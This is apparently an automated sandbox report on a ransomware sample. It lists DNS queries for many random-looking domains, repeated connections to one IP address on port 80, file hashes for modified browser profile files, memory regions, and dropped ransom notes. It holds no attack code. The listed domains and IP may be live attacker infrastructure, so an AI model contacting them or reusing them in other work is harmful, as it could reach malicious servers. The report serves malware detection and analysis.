US 8.8.8.8:53 wwqvsofkveue.co.uk udp
US 8.8.8.8:53 lowywrnvkfue.info udp
US 8.8.8.8:53 yexkaaaxdajo.com udp
US 8.8.8.8:53 nwuchbidowuy.net udp
US 8.8.8.8:53 bmvnkjufhrjj.biz udp
US 8.8.8.8:53 pdaeghqajvms.ru udp
US 8.8.8.8:53 qhbibpbhcfny.org udp
US 8.8.8.8:53 rlxhqqlhnnmn.co.uk udp
US 8.8.8.8:53 spyllyvogwnt.info udp
US 8.8.8.8:53 tsfvxcguujbx.com udp
US 8.8.8.8:53 uwgaskqcnsce.net udp
US 8.8.8.8:53 vbdyilbcybbs.biz udp
US 8.8.8.8:53 wfeddtljrkcy.ru udp
US 8.8.8.8:53 lollkhsearqs.org udp
US 8.8.8.8:53 yemwnmojrgwy.co.uk udp
US 8.8.8.8:53 mtjdewgsdfdr.info udp
US 8.8.8.8:53 ajkohccxutjx.com udp
US 8.8.8.8:53 nxqaickxpvtq.net udp
US 8.8.8.8:53 bnrllhgdhkaw.biz udp
US 8.8.8.8:53 odorcrxmsjgp.ru udp
LT 5.199.171.47:80 tcp
US 8.8.8.8:53 cspdfwtrkxmv.org udp
US 8.8.8.8:53 tstilrlokvoi.co.uk udp
US 8.8.8.8:53 uwumgwfccyxs.info udp
US 8.8.8.8:53 uxrafhydnjbh.com udp
US 8.8.8.8:53 vcseamsqfmkr.net udp
US 8.8.8.8:53 vcywjmdiaarg.biz udp
US 8.8.8.8:53 wgaberwvrdbq.ru udp
US 8.8.8.8:53 whwodcqwdnef.org udp
US 8.8.8.8:53 xlxsxhkkuqnp.co.uk udp
US 8.8.8.8:53 vdntcqupfiml.info udp
US 8.8.8.8:53 jsoffyhrxdbv.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 xllwmgiqgpdx.net udp
US 8.8.8.8:53 lbmipousykri.biz udp
US 8.8.8.8:53 xmsialmjumpj.ru udp
US 8.8.8.8:53 lcttdtylnhet.org udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 auqlkbakvtgv.co.uk udp
US 8.8.8.8:53 nkrwnjmmooug.info udp
US 8.8.8.8:53 ehvqdbnopmsf.com udp
US 8.8.8.8:53 flwuxjxvivtl.net udp
US 8.8.8.8:53 gpttnqbpqtjr.biz udp
LT 5.199.171.47:80 tcp
US 8.8.8.8:53 htuxiylwjdkx.ru udp
US 8.8.8.8:53 gqbfbvfifqvd.org udp
US 8.8.8.8:53 hucjveppxawj.co.uk udp
US 8.8.8.8:53 iyyillsjgxmp.info udp
US 8.8.8.8:53 jdamgtdqyhnv.com udp
US 8.8.8.8:53 xyitjylcmwxf.net udp
US 8.8.8.8:53 lmdhgehhbihl.biz udp
US 8.8.8.8:53 yegldigdsybv.ru udp
US 8.8.8.8:53 mrbyancihkkc.org udp
US 8.8.8.8:53 conlbgokllcl.co.uk udp
US 8.8.8.8:53 pciyxlkpawlr.info udp
US 8.8.8.8:53 dtldupjlrnfc.com udp
US 8.8.8.8:53 qhgqrufqgyoi.net udp
US 8.8.8.8:53 cpqkdjilodfj.biz udp
US 8.8.8.8:53 drlmeocydysx.ru udp
US 8.8.8.8:53 duocwsdmufia.org udp
US 8.8.8.8:53 ewjexxwajbvo.co.uk udp
US 8.8.8.8:53 gfvcuqltnrjp.info udp
US 8.8.8.8:53 hhqevvfhcnwe.com udp
LT 5.199.171.47:80 tcp
US 8.8.8.8:53 hkttoaguttmg.net udp
US 8.8.8.8:53 imovpfaiipau.biz udp
US 8.8.8.8:53 inkcbinqxiqp.ru udp
US 8.8.8.8:53 vbfpxqasbove.org udp
US 8.8.8.8:53 kviflrixcaqk.co.uk udp
US 8.8.8.8:53 xjdsiauafgvy.info udp
US 8.8.8.8:53 mdptspqywwuv.com udp
US 8.8.8.8:53 aqkhpxdbadak.net udp
US 8.8.8.8:53 olnwdylgbouq.biz udp
US 8.8.8.8:53 cyikahxieuaf.ru udp
US 8.8.8.8:53 messuskoaotc.org udp
US 8.8.8.8:53 ngnuvbuvdfli.co.uk udp
US 8.8.8.8:53 omqvfcfvegtw.info udp
US 8.8.8.8:53 polxgkpdhwld.com udp
US 8.8.8.8:53 qtxkmanwydxi.net udp
US 8.8.8.8:53 rvsmnixectpo.biz udp
US 8.8.8.8:53 scvnwjieduxd.ru udp
US 8.8.8.8:53 teqpxrslglpj.org udp
US 8.8.8.8:53 mdeggskaslkq.co.uk udp
US 8.8.8.8:53 aqytdxgfhwtw.info udp
US 8.8.8.8:53 nicxaixovywp.com udp
US 8.8.8.8:53 bvwlwnttkkgv.net udp
US 8.8.8.8:53 omjuealuvyxn.biz udp
US 8.8.8.8:53 caeibfhakkht.ru udp
US 8.8.8.8:53 prhmxpyjymkm.org udp
US 8.8.8.8:53 dfcauuuonxts.co.uk udp
US 8.8.8.8:53 qtmwadhjurru.info udp
US 8.8.8.8:53 rvhybibwjnfj.com udp
US 8.8.8.8:53 rykotsuxxfet.net udp
US 8.8.8.8:53 sbfquxolmbri.biz udp
US 8.8.8.8:53 sdrlxkiexffr.ru udp
GB 2.18.27.82:443 www.bing.com udp
US 8.8.8.8:53 tfmnypcrmbsg.org udp
US 8.8.8.8:53 tipdravsbsrq.co.uk udp
US 8.8.8.8:53 ukkfsfpgpoff.info udp
US 8.8.8.8:53 wrgoxcmleumh.com udp
US 8.8.8.8:53 kfbcukynhbrv.net udp
US 8.8.8.8:53 yaeriramfcdt.biz udp
US 8.8.8.8:53 mnyffamoiiii.ru udp
US 8.8.8.8:53 ybldvjnghiae.org udp
US 8.8.8.8:53 mogqsraikofs.co.uk udp
US 8.8.8.8:53 bjjggybhipqq.info udp
US 8.8.8.8:53 owetdhnjlvvf.com udp
US 8.8.8.8:53 biofrmjjgbpt.net udp
US 8.8.8.8:53 ckjhsutqjrha.biz udp
US 8.8.8.8:53 dqmiccwkhigg.ru udp
US 8.8.8.8:53 eshkdkhrkyxm.org udp
US 8.8.8.8:53 drttptkejodq.co.uk udp
US 8.8.8.8:53 etovqculmfuw.info udp
US 8.8.8.8:53 farwajxfkvtd.com udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 bazaar.abuse.ch udp
US 8.8.8.8:53 gcmybrimnmlj.net udp
US 8.8.8.8:53 pfmxhcqxiaix.ru udp
US 8.8.8.8:53 dqvkegpfgesu.org udp
US 8.8.8.8:53 qgwtnllytxag.co.uk udp
US 8.8.8.8:53 gfqgprkygtpr.info udp
US 8.8.8.8:53 hgbcvbfarrha.net udp
US 8.8.8.8:53 uvclfgbtflol.biz udp
US 8.8.8.8:53 kttlyiuqvmga.ru udp
US 8.8.8.8:53 lxunanopjlct.org udp
US 8.8.8.8:53 luehfrprhkxi.co.uk udp
US 8.8.8.8:53 myfjgwjqujtc.info udp
US 8.8.8.8:53 ojydqdklhauf.com udp
US 8.8.8.8:53 pnafriekuyqy.net udp
US 8.8.8.8:53 pkjywmfmsxmn.biz udp
US 8.8.8.8:53 qokbxrylgwih.ru udp
US 8.8.8.8:53 uolhoxoffbtn.org udp
US 8.8.8.8:53 iemqxgbscawh.co.uk udp
US 8.8.8.8:53 wsvgmhjmolaq.info udp
US 8.8.8.8:53 yeqygseaqois.net udp
US 8.8.8.8:53 mtripbqnnnlm.biz udp
US 8.8.8.8:53 bibxecyhayov.ru udp
US 8.8.8.8:53 oxchnkluwxrp.org udp
US 8.8.8.8:53 dstepjodghuj.co.uk udp
US 8.8.8.8:53 ewugqryydluu.info udp
US 8.8.8.8:53 fwednsjkprbm.com udp
US 8.8.8.8:53 gbffobtgmvbx.net udp
US 8.8.8.8:53 hiyvheexrujo.biz udp
US 8.8.8.8:53 imaximotoyja.ru udp
US 8.8.8.8:53 jmjufnyfbfpr.org udp

Files

SHA512 349ef11e188f6e6fa70b9d1ed38fc2054599535d080a751e8405f53b38b694ed272debe87ce03339003b402f3c3fa7e5b844cfc42d6c7c9939c9885416677adf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 a6c3e6f20673997186d939508d2a216b
SHA1 6dfa98c97fb9939e544356de78cab5ffc1f405dd
SHA256 25ffbd929c8efc71b1ff2e1a121823f968ca4502426d4711eb5bfb7120e025a5
SHA512 2aee54336d7ca6f5ac5ae205174bd7596eacd15542cd0adc5544f89fddd6ffadf3baa9b13c233e7319a5d526be120ad406509467c83909c62f9736dc9a507afc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 45c62c0268a5859c85873d5dbc5e7903
SHA1 d6e7f81f821adc3c6b2bae5ad38f6c786fce17ae
SHA256 855bae8071de2370eb5620a1f52759eb77c5ce891d837047fef045557285a14e
SHA512 0332a10e32a0124417a611a0742f38dca1ae1c46a26c5905c320b77b8a9c5fd828b3070d556d18a6506115fc4a6082422d660513d0ca652e19fd3dd03a9258b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b9feb557ff933ac812161b171c05b9fe
SHA1 2fc02b705fdf5c0eb2e1014b29e8c0a07526e110
SHA256 7877df370735741a73d54022299a743b962166a071b8adb25dd1cb6dd1a877f8
SHA512 1daab7c365242537515d84d354c12670d7ea02b71833c360168606dfc116d52e263c5c8aba38a7feefdc1ea3e4e04d4a6cb4607bc40a860beea4382951c1f44a

memory/6088-6032-0x0000000003530000-0x0000000003531000-memory.dmp

memory/4828-6034-0x000001E466970000-0x000001E466A70000-memory.dmp

memory/4828-6052-0x000001EC68790000-0x000001EC687B0000-memory.dmp

memory/4828-6067-0x000001EC687B0000-0x000001EC687D0000-memory.dmp

memory/4828-6066-0x000001EC687D0000-0x000001EC687F0000-memory.dmp

memory/4828-6081-0x000001EC7C000000-0x000001EC7C100000-memory.dmp

memory/5984-6136-0x0000000002E50000-0x0000000002E51000-memory.dmp

memory/1000-6140-0x00000274AF000000-0x00000274AF100000-memory.dmp

memory/1000-6138-0x00000274AF000000-0x00000274AF100000-memory.dmp

memory/1000-6151-0x00000274B0480000-0x00000274B04A0000-memory.dmp

memory/1000-6155-0x00000274B0460000-0x00000274B0480000-memory.dmp

memory/1000-6145-0x00000274B0440000-0x00000274B0460000-memory.dmp

memory/1000-6139-0x00000274AF000000-0x00000274AF100000-memory.dmp

memory/1000-6185-0x00000274C2D30000-0x00000274C2E30000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\0DNSAWKD\microsoft.windows[1].xml

MD5 d4cbe0d7270f245ea26901600f94e7d8
SHA1 74849b6bfbe0669c78bc0f58516b36371420e329
SHA256 78fe35c88d92335c319e14e6f4d5bf5cf161945bbf5f61dfda26dde2ded7e720
SHA512 7bf464acada98a283a60f392d494c20a001c5e1a6790d8f62472eac1dc1f6ff71435b94a94000c13ab27275c0511daa3a50d3ffd237059936fc946f51836a50d

memory/5464-6236-0x00000000028D0000-0x00000000028D1000-memory.dmp

memory/4272-6239-0x00000299EFD00000-0x00000299EFE00000-memory.dmp

memory/4272-6238-0x00000299EFD00000-0x00000299EFE00000-memory.dmp

memory/4272-6237-0x00000299EFD00000-0x00000299EFE00000-memory.dmp

memory/4272-6268-0x000002A1F2060000-0x000002A1F2080000-memory.dmp

memory/4272-6269-0x000002A1F20A0000-0x000002A1F20C0000-memory.dmp

memory/4272-6270-0x000002A1F2080000-0x000002A1F20A0000-memory.dmp

memory/4272-6284-0x000002A1F5770000-0x000002A1F5870000-memory.dmp

memory/4200-6360-0x0000000004780000-0x0000000004781000-memory.dmp

memory/4044-6364-0x000002761E360000-0x000002761E460000-memory.dmp

memory/4044-6375-0x000002761EFE0000-0x000002761F000000-memory.dmp

memory/4044-6395-0x000002761F500000-0x000002761F520000-memory.dmp

memory/4044-6394-0x000002761F7B0000-0x000002761F7D0000-memory.dmp

memory/4044-6409-0x0000027631DB0000-0x0000027631EB0000-memory.dmp

memory/4044-6484-0x0000027631AD0000-0x0000027631BD0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\ce5bfbb3-75a4-4225-a634-04beb4c7a324

MD5 0369441e9a2d9e3fc6e1d0f9a6d6a716
SHA1 98c17ccd2e27ab493c5f6bb027e81e92cd33dc7b
SHA256 e98f7d45c0ba92b683ea1e342396b01550531950f3b189d83523ddf2d34b735f
SHA512 f258181040f4dc825cd23a280fe65c3ab71740e7eeea2004f00eb2814596f81c9d19f824b2329e3bb90381ef890f7b004d4951703e307931af4d32dfe4afbb1e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\db\data.safe.tmp

MD5 d46c5c54629d7bae0545a84b4968d8f8
SHA1 f77b233157ccea73521fae013225e49bf82ff494
SHA256 b8705a66c208ab304b1903eb4d1edab56cda251bed19f74fcc48d25ef76d3173
SHA512 fb69d1a436513e90210c288cbec4e1e27b88f7f5cdb7238f408293b920c3b9defc867387cc868d366ae3fed41891bfec10c9c695455a143ebb8c86160f0fc800

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\50jftte4.default-release\activity-stream.discovery_stream.json.tmp

MD5 e04f581bae8e930af08c80a07cbc5697
SHA1 b428d9c9e88404cafa605a1aa0d5161f6755e149
SHA256 af3df915b52d01339e5bb04d6cdc57dc3cb4dccd833e6c091dce8b910e6d74e0
SHA512 e0d3a12388a4ece7bda60202e1a5488fdda509ab1b564e4a4d653b8808e22b917c6bd3da3e7adf6166f249d948c31faf07f55ad1bd4e1589bf93a53d257cf06a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\76ebbd5b-640e-442c-8581-1f0ae9f6a23b

MD5 14856bb13c7aa2dd8c2c4b231e54c3ce
SHA1 1d12671c90d475708a10f65011fd9aff8a7cdc24
SHA256 aa18094595d2a67a2ac0b6724cd50db35ed062119ab125db01509aa48b56cf48
SHA512 f1633efd0323a7f96550843ea96ceb3af770b35f2a57d97ffb1d18ae3aa79c1c6e0cb90f470df7329c753a5840eee6ecc6dd659262e575644039914b5bdeed4f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\events\events

MD5 7c78a6f2b8ab2b48bf552a1a2803ccb1
SHA1 e2b156e211daee66d16ad3662cba8654c0c727e7
SHA256 4a2358e3cfe7cd6cb353a4bbc9910fd63ce4c0d1596cfd4ca5df3643270a12e5
SHA512 5dbc2f50f5603a921c0face71f26abaa1a6a1866fdc4c3fdbfe3bc9ca297ebd3a6cb88094eebaa914e5f82d07cfbc78b6205c288bed7d1bf908072626ce330ee

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\7da26bf8-2c75-4e5f-9c43-76c1c5332619

MD5 9c9ee735e976b70b11b5052883f80e78
SHA1 7956fca2cd8340489fa1279f917710541bbe3ab7
SHA256 81bb50205586385721c7496e9d5007972e726292aa64212e50b13d3e11231902
SHA512 990c40032be34510dd4e7f31e496b7ee3c60010715520d8b3880509a565fbcc013a97c3cddc764db2835ca4f615f172dcc41adeb423288a9f10352a1ad2d5f27

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\7a9b962d-3cc2-4a4a-bf49-aaf70f938189

MD5 c52e732f3584019d6c2e40713b55499d
SHA1 ed21955478c64fef773270704849d165e6a1b2d0
SHA256 2fa9ac1b9c9c8beb47058e612bc828ba1093897659a68a4df04af694ab46216b
SHA512 0a213614f741840929767a559d51dc03f6b7ebd238f1c175aea9047bfcaa1efba62b8356f7bc84599767309144961c2c2dbc09db2470ea90d8162a95ebca761d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\6b758260-38f4-40ef-ae5e-fb3aacbabafc

MD5 168dbfe1a1de150ace50dc0e6d584a16
SHA1 3934767503c022e96d72a332b885ee432040b556
SHA256 a755e70fa8e5cbbd69c94a555a1086e9ef69871e69bd6360cd703acad46f3616
SHA512 715dcda5085ca4848de67f2b031e60aa9f76b6e3d696bb7818ae7d2fce02d8d6acd0c2e273d12ebd06fcf54871053530855da0f570cfa269ce9415e8aea13b58

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\pending_pings\642b5765-2dbe-4729-8b3c-e2550d693c21

MD5 6849b9548d52ab16cfd34dd2c9b3ab4a
SHA1 17bca104364692235ad7e5c8813204e95fa7fc69
SHA256 5f2a5f589226c770e5e65a6ea8238a02951004553df1bfed39b6eeed4b97a021
SHA512 a26c0a031041f06709ae1da345d4420b660191c28cce1f8107e629c73805df1109e810c3238189e7fd9491f56589d8525df5171288d9fe5f84f45eed00170040

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\datareporting\glean\db\data.safe.tmp

MD5 091f48122a2933d78325e7654dfca811
SHA1 857374a37da4a612613e4c45818cd4ed9625e7a6
SHA256 ecdeab692a4a094cae2d2d7fb3e0d2be8b798c346950fddd02b0d0db319c4fc3
SHA512 f5cd73a0607181291f4bed7d60764d386559aa57b880e01050014bcd5e8ff556d0f5c24021c142870bbd13137cd6e0238a9c3f6854355b0fb4867c9cd75e71f4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 58788450f75f871fbaeb5fec7657ab08
SHA1 c0a7c3272e1ca87f03918046f80bf7d82d020f95
SHA256 ed2be0ee6243959c65f418f056a7d25eca695c7c34450452d05e7afb233c77be
SHA512 5f3f1b93038d27d41bdcf9e7d507b41fd33eb4ec9f0791674bfe0965837ad61213f12d22de72f3dc3250e231fd7bdb412f36b7891ba24b6ea77c2661d199ceed

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\AlternateServices.bin

MD5 760f37666b065ccd6a417d6cd9d6a15e
SHA1 8dd1711addaace8b34b2b4a808cdda3dd16befa4
SHA256 d1ed2fe43a365179c094d1d7eddd61777b642b18d4be0d3c5e7595149e9554ac
SHA512 26b7f85c0364ada76cdf28935ce6415057d370f179d28c114920af4c40ff84a338911338f7a8aade077c7b5b7f09394488adb9c9d6b1156a0c825b419b74ca3f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c01fe6c1a10f0a96abf0286d6568950f
SHA1 cdfb3cc4e31fecaba651a934460166d2c71af5fa
SHA256 c96e178815e88d67f5ad98147028a24fd4d6c0b4d0a72529bc875dcc00f854e7
SHA512 42d9ac5fc6f7931912e1e6e26350064cf4f96fdf16fb0db134d117206b7ed76c3978042d088540432d0dc8a11f5537b719bbf9077943821c0816a48a477f25c2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\prefs-1.js

MD5 485b014f1b16f695a0ea33ef9655a342
SHA1 73a439f8144ce40fbd8b8d3a486560e843d70018
SHA256 bd902c8438cb6992a7424b4e5b81cfcdab16dbb52a73cad43b4b88dc2343267f
SHA512 7b5c2c185c63bd6c7d0cb78c1563499604b9dfdb42f112e7cc3e38a6156e8872358de45067be324ae3eef19c1307fd5778a2b28217917d2c43426b693d3cf062

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\sessionCheckpoints.json.tmp

MD5 362985746d24dbb2b166089f30cd1bb7
SHA1 6520fc33381879a120165ede6a0f8aadf9013d3b
SHA256 b779351c8c6b04cf1d260c5e76fb4ecf4b74454cc6215a43ea15a223bf5bdd7e
SHA512 0e85cd132c895b3bffce653aeac0b5645e9d1200eb21e23f4e574b079821a44514c1d4b036d29a7d2ea500065c7131aef81cfc38ff1750dbb0e8e0c57fdc2a61

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\prefs-1.js

MD5 b9485aad1455a99bf8ef9c2259ebef9b
SHA1 c1ebbeed84e969db0652d4521d0eb2d4edc3b41e
SHA256 0baa4438229d7505c3bc95664fd9f2796ada53cabcf37421b1d31179b1185390
SHA512 a10e2009647a11f3af4766db51359db018dcec3fd8069d1946ed212c3b661b093b71a774015b84b12a22f6f6182a0fc1bf23d4531ef313cd97a9138f08f6f7ab

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\50jftte4.default-release\prefs.js

MD5 44435cd745f11c9006e3f9802711960a
SHA1 f2a6324886b44ce7afbf1c25dec042685ae3c91a
SHA256 965a57a82458571c95a084359603a477e04e1aae7308fbbdfa9360647c857250
SHA512 53b5d6b0bbd6ca840657f5c505c1ac30246dbba88ae9537feaf9d71760c50f07c874cc82fcd563c848713473a9f0f7a9f03566e013f02128e0446aceca32da9b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133895706702730727.txt

MD5 d00683fb34dd1f20d42c6f52133048a8
SHA1 eed0ba25b7988f789673600f203cf3e25aea4634
SHA256 c6a19181777da094758bb94e9d8de7dcb6d731d0a626fe6f021a078265df6c6f
SHA512 68590417b48a37f3fbeb3303bb880b668dcfb27f91be79d71aa47aad1cf3108bec7fe9ceb497024882063a89eb90d8e1a17d02368a74f03120ab1fd70a99d6fc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9df7e7b56aaf435389d8fb6e6bfb51b4
SHA1 779df2bf57cc7139fd2a55a2e4414d85256283e3
SHA256 a07312a655c1bc7b7cb9df8df8d3bc033ed494859e02ee1f9f80430d292e2fd3
SHA512 822a0fe692f3a2ad04dd430b4427936a83338f747bc9b602007363083af8fbfdd30e41d79a6a2cd7550d862ebfe9b2854b72a10ec414b6f7703750fa0af2342e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 80be741eea57be5f35838c6eb5448f23
SHA1 9973dca11e7e5bbbfbdb5aa30b174db3e91b36ed
SHA256 d2beef110e45c24aadcb69551100adc28e8d9b18bc84766fadedec7d7855546f
SHA512 3de74966670e077eaae9c72f57d7b5546255d48713430690f20d096f82ffeecaaf5a24791502320c0699b34835e96325d292f7b6664dfe513424d224059671ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 352dd23643b1b0b270df6463d41a71f9
SHA1 03ac093f9b80c6caf3be0d1fe3bfb80d921316ed
SHA256 75a1a78e4e228dd5646208b2a442def1dae93a0ca2ee25861e4436e2205cf295
SHA512 cc7c56a63ea202cbc21dff0afca0c1f11ac11c59e552302f4094b7fc3d5a1b7ce72b40af0c30ffcf515cfb20160a6baf7cd92c827cbe16eb28a1ab4a0becee0e

memory/4200-7115-0x000000000BDC0000-0x000000000BDC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 d004f43f9b24af5357cdc360715b78da
SHA1 4b9b92c67ec7724e9f4fd009ef0c73f931cc4654
SHA256 fd4ac8ada93ec2138c4159957f1ceb7bc29b8a40f97cd0e60538c03abf6e05cf
SHA512 fb92c47e8ad1d7547a2bef54a934806390d62625259b7ccf0d7d679d0ce49122eef2ad4457b6a31089d5dcd0f79d3e03ceb45a7e658ac87b57e1bb87241b58b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f0dc5cb8128b4963a9ca7ea2848bed61
SHA1 5ea0204c18d2a6116f967b761159937387e9d2ee
SHA256 a4cf85a6d8a4f1a4f439dd9fc91dadd09f2d51a68a3d69cd7ae1e5563d57cbd0
SHA512 8f20d19f92e5a14e4bc99ad7c16a0a5c2fed7a2964a61af240f1e8955f9d8b47207706f8a46575e202f550dd4bd7fd98e1f51f6e3948874d2525da91ac64eb4f

memory/5852-7194-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/5852-7195-0x0000000075390000-0x00000000755CA000-memory.dmp

memory/5852-11101-0x0000000076C70000-0x0000000076E0D000-memory.dmp

memory/5852-13110-0x0000000076E10000-0x0000000076E8D000-memory.dmp

C:\Users\Admin\Videos\HELP_DECRYPT_YOUR_FILES.txt

MD5 e44cd015c009e47aab9b1b11e1fc4936
SHA1 afec3d12392b51918c1c42b5aed1625dae007ac3
SHA256 8cfeb845d5738b90bcb227b6298dde6114f1cb0042f7c596f6a3d599a2621b95
SHA512 53e40588c2dd6b3d76752496ed74a55d173571e9794ffd88e78c291dcaa39d955e8046d9946478cec92c7ab41e12ea4a8cae589a61219b85986d4723c26e5522

C:\Users\Admin\Documents\Restore-My-Files.txt

MD5 b023ea7e46ed17e1b9cbad3a5f944db2
SHA1 700da850404b343d7873cb1ec60ad5afabcf5469
SHA256 c148c6f679d12a3b62ad158cf1406f8fa3ad69ba7463095985a7170aca288ec0
SHA512 2eca371570a99ff7d6788dd032f9fdff63104ab2dd0469129fc2cf2331e006225c847f0d598c6d52fc5de9f335c4c2e58aaf62e89d337fa17165720153e585e4

C:\Users\Admin\Contacts\HELP_DECRYPT_YOUR_FILES.txt

MD5 3cc2d08244a1ead086546c489687293b
SHA1 125f58a55ab503e5c3a5b356a9ccf7c172594f75
SHA256 987d8d5bbd17af1eb51e1b0907b1c823e79a135212a105ff06943d7406ed4561
SHA512 4f7f40aa4fae5d29c7c91c798e69b0a49f518d73011eaa5e2c72efc67e32a687cd921c5998f3acace6fdd3de2e4a2470d56ada55e67f24d6d35d4ccad619e3db

memory/5852-20385-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/5852-20325-0x0000000006590000-0x0000000006B36000-memory.dmp

memory/5852-20324-0x0000000005BF0000-0x0000000005C8C000-memory.dmp

memory/5852-20323-0x0000000000400000-0x00000000004CE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 be24f3fbf54e8b0bc9b453c5824064ea
SHA1 ac0d13430ff46da8436911866a3bf3a438c8a2aa
SHA256 d0dda3d7fbc525a867d6159c675fa5dec71483d5d8f37a5036687c9dbb3c3bb7
SHA512 1f1e47943b601ed725ea61c483e43a65091f53e3ceec704155a18e8ba2620b1abf5640c207e1ba107dbb2227cec95d5d6bd39940e2487413d84afe2d508c8a47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 f80c027c6d8a7f4036edf458eb40a0fb
SHA1 d1839fc3f9bcdf30c05fa9de2e54864a6ef0c760
SHA256 e370ef172127e47edea851c3899a3b5f531ff9a6d17a7007f7ea12e896b90f6c
SHA512 4647998067f3e803d70d18e6207101e354cd4582a138d3e252021c3d5d144516b7b46819e30176d84875f4a50196e56fd29fdc0ad753d3c2f0c8110aafdb1a3c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cce1bf5d00ac5b883be07fedaad8171d
SHA1 ec2379de11c0a07b43233c7bfa66cc9806c55385
SHA256 dce7621c71739a4697658050ca3f4c61ac20e0aee0de5dd5ea99c9df887802d5
SHA512 234e056daa11b82a6bbbdc4a9ecc8f0f904e03a4b8268364479a2e953745130e7f1511219b9269437c68070c29aae8c02bdd775b0811cd586043a215fdd4bbf1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 74fa4573dcb40ce3e6e14974294afdec
SHA1 c44827078607848896401ab40a8ff1d08c27c811
SHA256 cdab4112195a44f785d9fb4a85271a6a5fd7c62ec07b5885316583d963c5372c
SHA512 43d49ed1332ad81a91db072f72dab5a70bb4eca29e101a70939b558625fa025c3f3f58cb3ccdc8f5cbc1384d9185c2446db706705cd656d8f9331961783ae0e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 936336d3c2cdb01c335cf15df92065d2
SHA1 a4fe5e62d5e7648c3566c1647242ecf42e3cf1a7
SHA256 c3d04412d9fcc9c9b44525b93aef645ba29ab734ebbf030e6f451cf78fb29433
SHA512 0c0c74b647d494077ec42a8f3d27d5d60e18575cd2db9c4e5b6c1f6fd5e9725df8fd5757a5decd74365e97709de6a6ba512c690fcf5fbedd5597ac9f8185da22

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 e0e91e14952f0d1547bd9b7b187330d1
SHA1 424f08a552899b3dd527647b6b39ab2b9b55d77b
SHA256 7b119599e7bc6cb3948288e512ecc013801b2c4656ab59ce3f56de452a7f8c99
SHA512 17c180a264f43fe59147771f6a86ec96f11334bc64e30065bce274af1593efc0af9ec68979fed41a5b2ffe6bace43544c8322b6658fe3595ee778cc794da9463

memory/14420-20610-0x000000001BE90000-0x000000001BED2000-memory.dmp

memory/14420-20613-0x000000001CA20000-0x000000001CAC6000-memory.dmp

memory/14420-20614-0x000000001CFA0000-0x000000001D46E000-memory.dmp

memory/14420-20615-0x000000001D580000-0x000000001D61C000-memory.dmp

memory/14420-20616-0x000000001BE40000-0x000000001BE48000-memory.dmp

memory/14420-20617-0x000000001D7E0000-0x000000001D82C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 8c6b49c21ae083572eaeecb02c0efee6
SHA1 a8a18d42bcba0875093c35410ebad66d0cf1db16
SHA256 8d0d391911f5a947c6134f0637a7706291b81d713f1f572961ff0965734181d4
SHA512 f1b55e0722b075d6b19144be55b9babcab06b67ece9c6d1fe367c15345bf249676d6023e13679b1bcd5df979bf1028d0329a49888eedd608bc7093f90684b812

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 34b61dde98276b1a374db59798b4fec7
SHA1 c8b0ed7a18ccc05494ff07e43362005cd35f4555
